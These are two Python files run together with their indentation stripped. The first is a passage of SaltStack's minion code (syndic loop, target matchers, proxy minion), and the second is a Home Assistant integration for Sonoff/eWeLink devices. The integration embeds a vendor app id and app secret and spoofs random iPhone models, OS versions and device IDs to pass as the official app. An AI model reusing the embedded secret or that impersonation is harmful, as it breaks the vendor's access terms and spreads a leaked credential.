zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
            # I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
                # EINTR: some kind of signal, maybe someone trying to get us to
                # quit, so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event %s', event['tag'])
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
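            # Aggregate job returns under their jid tag so _forward_events() can
            # push them back to the higher level master in one batch; anything
            # that is not a job return is collected into raw_events instead.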
if salt.utils.is_jid(event['tag']) and 'return' in event['data']:
                if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = salt.utils.jid_load(
event['data']['jid'],
self.local.opts['cachedir'],
self.opts['hash_type'])
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
                if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
        # We borrowed the local client's poller, so give it back before it is
        # destroyed. This does not delete the poller, just our reference to it.
del self.poller
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class Matcher(object):
'''
    Used to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
if functions is None:
functions = salt.loader.minion_mods(self.opts)
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
        if not isinstance(tgt, str):
            return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delim=':'):
'''
Reads in the grains glob match
'''
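        # e.g. tgt 'os:Ubuntu' or, for nested grains, 'ec2_tags:role:web'
        # (illustrative values; the delimiter defaults to ':')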
log.debug('grains target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt, delim=delim)
def grain_pcre_match(self, tgt, delim=':'):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delim=delim, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
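        # e.g. tgt 'role:web*' looks up data.getval('role') and globs the result
        # against 'web*' (illustrative key/pattern)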
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def exsel_match(self, tgt):
'''
        Runs a function and returns its result
'''
if tgt not in self.functions:
return False
return self.functions[tgt]()
def pillar_match(self, tgt, delim=':'):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delim not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'], tgt, delim=delim)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
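        # e.g. tgt '10.0.0.0/24' (CIDR) or '10.0.0.1' (single address);
        # illustrative addresses, matched against the minion's ipv4 grains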
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
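        # Illustrative example (not from the original source): a target such as
        # 'G@os:Ubuntu and webserv* or E@db.*' is split on whitespace and each
        # token is dispatched through the ref map above or, failing that,
        # evaluated as a hostname glob.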
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
            # the 'G, P, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results:
if match == 'not':
if results[-1] == 'and':
pass
elif results[-1] == 'or':
pass
else:
results.append('and')
results.append(match)
else:
                    # the expression starts with an operator; only parentheses are allowed here
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results)
except Exception:
log.error('Invalid compound target: {0}'.format(tgt))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ and (not(hasattr(zmq, 'zmq_version_info')) or
zmq.zmq_version_info() < (3, 2)):
# PyZMQ 2.1.9 does not have zmq_version_info
log.warning('You have a version of ZMQ less than ZMQ 3.2! There '
'are known connection keep-alive issues with ZMQ < '
'3.2 which may result in loss of contact with '
'minions. Please upgrade your ZMQ!')
        # Late setup of the opts grains, so we can log from the grains
        # module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.authenticate(timeout, safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.functions, self.returners = self._load_modules()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules()
|
__init__.py
|
# The domain of your component. Should be equal to the name of your component.
import logging, time, hmac, hashlib, random, base64, json, socket, requests, re, threading, hashlib, string
import voluptuous as vol
import asyncio
from datetime import timedelta
from datetime import datetime
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.helpers import discovery
from homeassistant.helpers import config_validation as cv
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, CONF_SCAN_INTERVAL,
CONF_EMAIL, CONF_PASSWORD, CONF_USERNAME,
HTTP_MOVED_PERMANENTLY, HTTP_BAD_REQUEST,
HTTP_UNAUTHORIZED, HTTP_NOT_FOUND)
CONF_API_REGION = 'api_region'
CONF_GRACE_PERIOD = 'grace_period'
CONF_DEBUG = 'debug'
CONF_ENTITY_PREFIX = 'entity_prefix'
DOMAIN = "sonoffewe"
REQUIREMENTS = ['uuid', 'websocket-client==0.54.0']
import websocket
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Exclusive(CONF_USERNAME, CONF_PASSWORD): cv.string,
vol.Exclusive(CONF_EMAIL, CONF_PASSWORD): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_API_REGION, default='eu'): cv.string,
vol.Optional(CONF_SCAN_INTERVAL, default=timedelta(seconds=30)): cv.time_period,
vol.Optional(CONF_GRACE_PERIOD, default=600): cv.positive_int,
vol.Optional(CONF_ENTITY_PREFIX, default=True): cv.boolean,
vol.Optional(CONF_DEBUG, default=False): cv.boolean
}, extra=vol.ALLOW_EXTRA),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass, config):
"""Setup the eWelink/Sonoffewe component."""
_LOGGER.debug("Create the main object")
hass.data[DOMAIN] = Sonoffewe(hass, config)
if hass.data[DOMAIN].get_wshost(): # make sure login was successful
for component in ['switch','sensor']:
discovery.load_platform(hass, component, DOMAIN, {}, config)
hass.bus.async_listen('sonoffewe_state', hass.data[DOMAIN].state_listener)
# close the websocket when HA stops
# hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, hass.data[DOMAIN].get_ws().close())
def update_devices(event_time):
asyncio.run_coroutine_threadsafe( hass.data[DOMAIN].async_update(), hass.loop)
async_track_time_interval(hass, update_devices, hass.data[DOMAIN].get_scan_interval())
return True
class Sonoffewe():
def __init__(self, hass, config):
self._hass = hass
        # get config details from configuration.yaml
self._email = config.get(DOMAIN, {}).get(CONF_EMAIL,'')
self._username = config.get(DOMAIN, {}).get(CONF_USERNAME,'')
self._password = config.get(DOMAIN, {}).get(CONF_PASSWORD,'')
self._api_region = config.get(DOMAIN, {}).get(CONF_API_REGION,'')
self._entity_prefix = config.get(DOMAIN, {}).get(CONF_ENTITY_PREFIX,'')
self._scan_interval = config.get(DOMAIN, {}).get(CONF_SCAN_INTERVAL)
self._sonoffewe_debug = config.get(DOMAIN, {}).get(CONF_DEBUG, False)
self._sonoffewe_debug_log = []
if self._email and not self._username: # backwards compatibility
self._username = self._email.strip()
self._skipped_login = 0
self._grace_period = timedelta(seconds=config.get(DOMAIN, {}).get(CONF_GRACE_PERIOD,''))
self._devices = []
self._user_apikey = None
self._ws = None
self._wshost = None
self.write_debug('{}', new=True)
self.do_login()
def get_scan_interval(self):
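        # Clamp the polling interval: 10 seconds while the debug switch is
        # active, otherwise never more frequent than 60 seconds.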
if DOMAIN in self._hass.data and self._hass.data[DOMAIN].get_debug_state():
self._scan_interval = timedelta(seconds=10)
elif self._scan_interval < timedelta(seconds=60):
self._scan_interval = timedelta(seconds=60)
return self._scan_interval
def get_debug_state(self):
return self._sonoffewe_debug
def get_entity_prefix(self):
        # whether the entity ids should be prefixed with `sonoffewe_` or not;
        # a quick fix for the (i-blame-myself) `master` vs. `websocket` implementations
return self._entity_prefix
def do_login(self):
import uuid
# reset the grace period
self._skipped_login = 0
self._model = 'iPhone' + random.choice(['6,1', '6,2', '7,1', '7,2', '8,1', '8,2', '8,4', '9,1', '9,2', '9,3', '9,4', '10,1', '10,2', '10,3', '10,4', '10,5', '10,6', '11,2', '11,4', '11,6', '11,8'])
self._romVersion = random.choice([
'10.0', '10.0.2', '10.0.3', '10.1', '10.1.1', '10.2', '10.2.1', '10.3', '10.3.1', '10.3.2', '10.3.3', '10.3.4',
'11.0', '11.0.1', '11.0.2', '11.0.3', '11.1', '11.1.1', '11.1.2', '11.2', '11.2.1', '11.2.2', '11.2.3', '11.2.4', '11.2.5', '11.2.6', '11.3', '11.3.1', '11.4', '11.4.1',
'12.0', '12.0.1', '12.1', '12.1.1', '12.1.2', '12.1.3', '12.1.4', '12.2', '12.3', '12.3.1', '12.3.2', '12.4', '12.4.1', '12.4.2',
'13.0', '13.1', '13.1.1', '13.1.2', '13.2'
])
self._appVersion = random.choice(['3.5.3', '3.5.4', '3.5.6', '3.5.8', '3.5.10', '3.5.12', '3.6.0', '3.6.1', '3.7.0', '3.8.0', '3.9.0', '3.9.1', '3.10.0', '3.11.0'])
self._imei = str(uuid.uuid4())
_LOGGER.debug(json.dumps({
'model' : self._model,
'romVersion' : self._romVersion,
'appVersion' : self._appVersion,
'imei' : self._imei
}))
app_details = {
'password' : self._password,
'version' : '6',
'ts' : int(time.time()),
'nonce' : ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)),
'appid' : 'oeVkj2lYFGnJu5XUtWisfW4utiN4u9Mq',
'imei' : self._imei,
'os' : 'iOS',
'model' : self._model,
'romVersion': self._romVersion,
'appVersion': self._appVersion
}
if re.match(r'[^@]+@[^@]+\.[^@]+', self._username):
app_details['email'] = self._username
else:
app_details['phoneNumber'] = self._username
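        # The login body is signed with HMAC-SHA256 using the app secret below
        # and sent in the Authorization header as 'Sign <base64 digest>'.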
decryptedAppSecret = b'6Nz4n0xA8s8qdxQf2GqurZj2Fs55FUvM'
hex_dig = hmac.new(
decryptedAppSecret,
str.encode(json.dumps(app_details)),
digestmod=hashlib.sha256).digest()
sign = base64.b64encode(hex_dig).decode()
self._headers = {
'Authorization' : 'Sign ' + sign,
'Content-Type' : 'application/json;charset=UTF-8'
}
r = requests.post('https://{}-api.coolkit.cc:8080/api/user/login'.format(self._api_region),
headers=self._headers, json=app_details)
resp = r.json()
# get a new region to login
if 'error' in resp and 'region' in resp and resp['error'] == HTTP_MOVED_PERMANENTLY:
self._api_region = resp['region']
self._wshost = None
_LOGGER.warning("found new region: >>> %s <<< (you should change api_region option to this value in configuration.yaml)", self._api_region)
# re-login using the new localized endpoint
self.do_login()
elif 'error' in resp and resp['error'] in [HTTP_NOT_FOUND, HTTP_BAD_REQUEST]:
# (most likely) login with +86... phone number and region != cn
if '@' not in self._username and self._api_region in ['eu', 'us']:
# self._api_region = 'cn'
# self.do_login()
_LOGGER.error('Login failed! try to change the api_region to \'cn\' OR \'as\'')
else:
_LOGGER.error("Couldn't authenticate using the provided credentials!")
else:
if 'at' not in resp:
_LOGGER.error('Login failed! Please check credentials!')
return
self._bearer_token = resp['at']
self._user_apikey = resp['user']['apikey']
self._headers.update({'Authorization' : 'Bearer ' + self._bearer_token})
self.update_devices() # to write the devices list
# get/find the websocket host
if not self._wshost:
self.set_wshost()
if self.get_wshost() is not None:
self.thread = threading.Thread(target=self.init_websocket)
self.thread.daemon = True
self.thread.start()
def set_wshost(self):
r = requests.post('https://%s-disp.coolkit.cc:8080/dispatch/app' % self._api_region, headers=self._headers)
resp = r.json()
if 'error' in resp and resp['error'] == 0 and 'domain' in resp:
self._wshost = resp['domain']
_LOGGER.info("Found websocket address: %s", self._wshost)
else:
_LOGGER.error("Couldn't find a valid websocket host, abording Sonoffewe init")
async def state_listener(self, event):
if not self.get_ws().connected:
_LOGGER.error('websocket is not connected')
return
_LOGGER.debug('received state event change from: %s' % event.data['deviceid'])
new_state = event.data['state']
# convert from True/False to on/off
if isinstance(new_state, (bool)):
new_state = 'on' if new_state else 'off'
device = self.get_device(event.data['deviceid'])
outlet = event.data['outlet']
if outlet is not None:
_LOGGER.debug("Switching `%s - %s` on outlet %d to state: %s", \
device['deviceid'], device['name'] , (outlet+1) , new_state)
else:
_LOGGER.debug("Switching `%s` to state: %s", device['deviceid'], new_state)
if not device:
_LOGGER.error('unknown device to be updated')
return False
"""
the payload rule is like this:
normal device (non-shared)
apikey = login apikey (= device apikey too)
shared device
apikey = device apikey
            selfApiKey  = login apikey (yes, it is really spelled selfApikey and not selfApiKey :|)
"""
if outlet is not None:
params = { 'switches' : device['params']['switches'] }
params['switches'][outlet]['switch'] = new_state
else:
params = { 'switch' : new_state }
payload = {
'action' : 'update',
'userAgent' : 'app',
'params' : params,
'apikey' : device['apikey'],
'deviceid' : str(device['deviceid']),
'sequence' : str(time.time()).replace('.',''),
'controlType' : device['params']['controlType'] if 'controlType' in device['params'] else 4,
'ts' : 0
}
# this key is needed for a shared device
if device['apikey'] != self.get_user_apikey():
payload['selfApikey'] = self.get_user_apikey()
self.get_ws().send(json.dumps(payload))
        # also set the pseudo-internal state of the device until the real refresh kicks in
for idxd, dev in enumerate(self._devices):
if dev['deviceid'] == device['deviceid']:
if outlet is not None:
self._devices[idxd]['params']['switches'][outlet]['switch'] = new_state
else:
self._devices[idxd]['params']['switch'] = new_state
data = json.dumps({'entity_id' : str(device['deviceid']), 'outlet': outlet, 'new_state' : new_state})
self.write_debug(data, type='S')
def init_websocket(self):
# keep websocket open indefinitely
while True:
_LOGGER.debug('(re)init websocket')
self._ws = WebsocketListener(sonoffewe=self, on_message=self.on_message, on_error=self.on_error)
try:
                # the 145 second ping interval is defined by the first websocket response after login
self._ws.run_forever(ping_interval=145)
finally:
self._ws.close()
def on_message(self, *args):
        data = args[-1] # to accommodate the weird behaviour where the function receives 2 or 3 args
_LOGGER.debug('websocket msg: %s', data)
data = json.loads(data)
if 'action' in data and data['action'] == 'update' and 'params' in data:
if 'switch' in data['params'] or 'switches' in data['params']:
for idx, device in enumerate(self._devices):
if device['deviceid'] == data['deviceid']:
self._devices[idx]['params'] = data['params']
if 'switches' in data['params']:
for switch in data['params']['switches']:
self.set_entity_state(data['deviceid'], switch['switch'], switch['outlet'])
else:
self.set_entity_state(data['deviceid'], data['params']['switch'])
break # do not remove
self.write_debug(json.dumps(data), type='W')
def on_error(self, *args):
        error = args[-1] # to accommodate the case when the function receives 2 or 3 args
_LOGGER.error('websocket error: %s' % str(error))
def is_grace_period(self):
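        # Grace period: while (skipped logins * scan interval) is still below
        # the configured grace_period, keep serving the cached device state
        # instead of re-authenticating on every failed update.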
grace_time_elapsed = self._skipped_login * int(self.get_scan_interval().total_seconds())
grace_status = grace_time_elapsed < int(self._grace_period.total_seconds())
if grace_status:
self._skipped_login += 1
return grace_status
def set_entity_state(self, deviceid, state, outlet=None):
entity_id = 'switch.%s%s%s' % (
'sonoffewe_' if self._entity_prefix else '',
deviceid,
'_'+str(outlet+1) if outlet is not None else ''
)
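        # e.g. deviceid '10001abcde' with outlet 1 becomes
        # 'switch.sonoffewe_10001abcde_2' (illustrative id; outlets are 0-based
        # internally and 1-based in the entity id)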
        # possible @PATCH for when (presumably) the device is reported offline in HA but an update comes in over the websocket
if hasattr(self._hass.states.get(entity_id), 'attributes'):
attr = self._hass.states.get(entity_id).attributes
self._hass.states.set(entity_id, state, attr)
data = json.dumps({'entity_id' : entity_id, 'outlet': outlet, 'state' : state})
self.write_debug(data, type='s')
def update_devices(self):
if self.get_user_apikey() is None:
_LOGGER.error("Initial login failed, devices cannot be updated!")
return self._devices
# we are in the grace period, no updates to the devices
if self._skipped_login and self.is_grace_period():
_LOGGER.info("Grace period active")
return self._devices
        r = requests.get('https://{}-api.coolkit.cc:8080/api/user/device?lang=en&apiKey={}&getTags=1&version=6&ts={}&nonce={}&appid=oeVkj2lYFGnJu5XUtWisfW4utiN4u9Mq&imei={}&os=iOS&model={}&romVersion={}&appVersion={}'.format(
            self._api_region, self.get_user_apikey(), str(int(time.time())), ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)), self._imei, self._model, self._romVersion, self._appVersion
        ), headers=self._headers)
# _LOGGER.error(r.text)
resp = r.json()
if 'error' in resp and resp['error'] in [HTTP_BAD_REQUEST, HTTP_UNAUTHORIZED]:
# @IMPROVE add maybe a service call / switch to deactivate sonoffewe component
if self.is_grace_period():
_LOGGER.warning("Grace period activated!")
# return the current (and possible old) state of devices
# in this period any change made with the mobile app (on/off) won't be shown in HA
return self._devices
_LOGGER.info("Re-login component")
self.do_login()
self._devices = r.json()['devicelist'] if 'devicelist' in r.json() else r.json()
self.write_debug(r.text, type='D')
return self._devices
def get_devices(self, force_update = False):
if force_update:
return self.update_devices()
return self._devices
def get_device(self, deviceid):
for device in self.get_devices():
if 'deviceid' in device and device['deviceid'] == deviceid:
return device
def get_bearer_token(self):
return self._bearer_token
def get_user_apikey(self):
return self._user_apikey
def get_ws(self):
return self._ws
def get_wshost(self):
return self._wshost
def get_model(self):
return self._model
def get_romVersion(self):
return self._romVersion
async def async_update(self):
devices = self.update_devices()
def get_outlets(self, device):
# information found in ewelink app source code
name_to_outlets = {
'SOCKET' : 1,
'SWITCH_CHANGE' : 1,
'GSM_UNLIMIT_SOCKET' : 1,
'SWITCH' : 1,
'THERMOSTAT' : 1,
'SOCKET_POWER' : 1,
'GSM_SOCKET' : 1,
'POWER_DETECTION_SOCKET': 1,
'SOCKET_2' : 2,
'GSM_SOCKET_2' : 2,
'SWITCH_2' : 2,
'SOCKET_3' : 3,
'GSM_SOCKET_3' : 3,
'SWITCH_3' : 3,
'SOCKET_4' : 4,
'GSM_SOCKET_4' : 4,
'SWITCH_4' : 4,
'CUN_YOU_DOOR' : 4
}
uiid_to_name = {
1 : "SOCKET",
2 : "SOCKET_2",
3 : "SOCKET_3",
4 : "SOCKET_4",
5 : "SOCKET_POWER",
6 : "SWITCH",
7 : "SWITCH_2",
8 : "SWITCH_3",
9 : "SWITCH_4",
10 : "OSPF",
11 : "CURTAIN",
12 : "EW-RE",
13 : "FIREPLACE",
14 : "SWITCH_CHANGE",
15 : "THERMOSTAT",
16 : "COLD_WARM_LED",
17 : "THREE_GEAR_FAN",
18 : "SENSORS_CENTER",
19 : "HUMIDIFIER",
22 : "RGB_BALL_LIGHT",
23 : "NEST_THERMOSTAT",
24 : "GSM_SOCKET",
25 : 'AROMATHERAPY',
26 : "RuiMiTeWenKongQi",
27 : "GSM_UNLIMIT_SOCKET",
28 : "RF_BRIDGE",
29 : "GSM_SOCKET_2",
30 : "GSM_SOCKET_3",
31 : "GSM_SOCKET_4",
32 : "POWER_DETECTION_SOCKET",
33 : "LIGHT_BELT",
34 : "FAN_LIGHT",
35 : "EZVIZ_CAMERA",
36 : "SINGLE_CHANNEL_DIMMER_SWITCH",
38 : "HOME_KIT_BRIDGE",
40 : "FUJIN_OPS",
41 : "CUN_YOU_DOOR",
42 : "SMART_BEDSIDE_AND_NEW_RGB_BALL_LIGHT",
43 : "",
44 : "",
45 : "DOWN_CEILING_LIGHT",
46 : "AIR_CLEANER",
49 : "MACHINE_BED",
51 : "COLD_WARM_DESK_LIGHT",
52 : "DOUBLE_COLOR_DEMO_LIGHT",
53 : "ELECTRIC_FAN_WITH_LAMP",
55 : "SWEEPING_ROBOT",
56 : "RGB_BALL_LIGHT_4",
57 : "MONOCHROMATIC_BALL_LIGHT",
59 : "MUSIC_LIGHT_BELT",
60 : "NEW_HUMIDIFIER",
61 : "KAI_WEI_ROUTER",
62 : "MEARICAMERA",
66 : "ZIGBEE_MAIN_DEVICE",
67 : "RollingDoor",
68 : "KOOCHUWAH",
1001 : "BLADELESS_FAN",
1003 : "WARM_AIR_BLOWER",
1000 : "ZIGBEE_SINGLE_SWITCH",
1770 : "ZIGBEE_TEMPERATURE_SENSOR",
1256 : "ZIGBEE_LIGHT"
}
if device['uiid'] in uiid_to_name.keys() and \
uiid_to_name[device['uiid']] in name_to_outlets.keys():
return name_to_outlets[uiid_to_name[device['uiid']]]
return None
    ### sonoffewe_debug.log section ###
def write_debug(self, data, type = '', new = False):
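        # Debug capture: while switch.sonoffewe_debug is 'on', sanitized copies
        # of the API/websocket payloads are buffered; when the switch is turned
        # 'off' the buffer is flushed into a persistent notification and cleared.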
if self._sonoffewe_debug and self._hass.states.get('switch.sonoffewe_debug') and self._hass.states.is_state('switch.sonoffewe_debug','on'):
if not len(self._sonoffewe_debug_log):
_LOGGER.debug("init sonoffewe debug data capture")
self._sonoffewe_debug_log.append(".\n--------------COPY-FROM-HERE--------------\n\n")
data = json.loads(data)
# remove extra info
if isinstance(data, list):
for idx, d in enumerate(data):
for k in ['extra', 'sharedTo','settings','group','groups','deviceUrl','deviceStatus',
'location','showBrand','brandLogoUrl','__v','_id','ip',
'deviceid','createdAt','devicekey','apikey','partnerApikey','tags']:
if k in d.keys(): del d[k]
for k in ['staMac','bindInfos','rssi','timers','partnerApikey']:
if k in d['params'].keys(): del d['params'][k]
# hide deviceid
if 'deviceid' in d.keys():
m = hashlib.md5()
m.update(d['deviceid'].encode('utf-8'))
d['deviceid'] = m.hexdigest()
data[idx] = d
data = json.dumps(data, indent=2, sort_keys=True)
data = self.clean_data(data)
data = json.dumps(json.loads(data))
data = "%s [%s] %s\n\n" % (datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3], type, data)
self._sonoffewe_debug_log.append(data)
elif self._sonoffewe_debug and len(self._sonoffewe_debug_log) and \
self._hass.states.get('switch.sonoffewe_debug') and \
self._hass.states.is_state('switch.sonoffewe_debug','off'):
_LOGGER.debug("end of sonoffewe debug log")
self._sonoffewe_debug_log.append("---------------END-OF-COPY----------------\n")
self._sonoffewe_debug_log = [x.encode('utf-8') for x in self._sonoffewe_debug_log]
self._hass.components.persistent_notification.async_create(str(b"".join(self._sonoffewe_debug_log), 'utf-8'), 'Sonoffewe debug')
self._sonoffewe_debug_log = []
def clean_data(self, data):
data = re.sub(r'"phoneNumber": ".*"', '"phoneNumber": "[hidden]",', data)
# data = re.sub(r'"name": ".*"', '"name": "[hidden]",', data)
data = re.sub(r'"ip": ".*",', '"ip": "[hidden]",', data)
#data = re.sub(r'"deviceid": ".*",', '"deviceid": "[hidden]",', data)
# data = re.sub(r'"_id": ".*",', '"_id": "[hidden]",', data)
data = re.sub(r'"\w{2}:\w{2}:\w{2}:\w{2}:\w{2}:\w{2}"', '"xx:xx:xx:xx:xx:xx"', data)
data = re.sub(r'"\w{8}-\w{4}-\w{4}-\w{4}-\w{12}"', '"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"', data)
# data = re.sub(r'"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+Z"', '"xxxx-xx-xxxxx:xx:xx.xxx"', data)
return data
class WebsocketListener(threading.Thread, websocket.WebSocketApp):
def __init__(self, sonoffewe, on_message=None, on_error=None):
self._sonoffewe = sonoffewe
threading.Thread.__init__(self)
websocket.WebSocketApp.__init__(self, 'wss://{}:8080/api/ws'.format(self._sonoffewe.get_wshost()),
on_open=self.on_open,
on_error=on_error,
on_message=on_message,
on_close=self.on_close)
self.connected = False
self.last_update = time.time()
def on_open(self, *args):
self.connected = True
self.last_update = time.time()
payload = {
'action' : "userOnline",
'userAgent' : 'app',
'version' : 6,
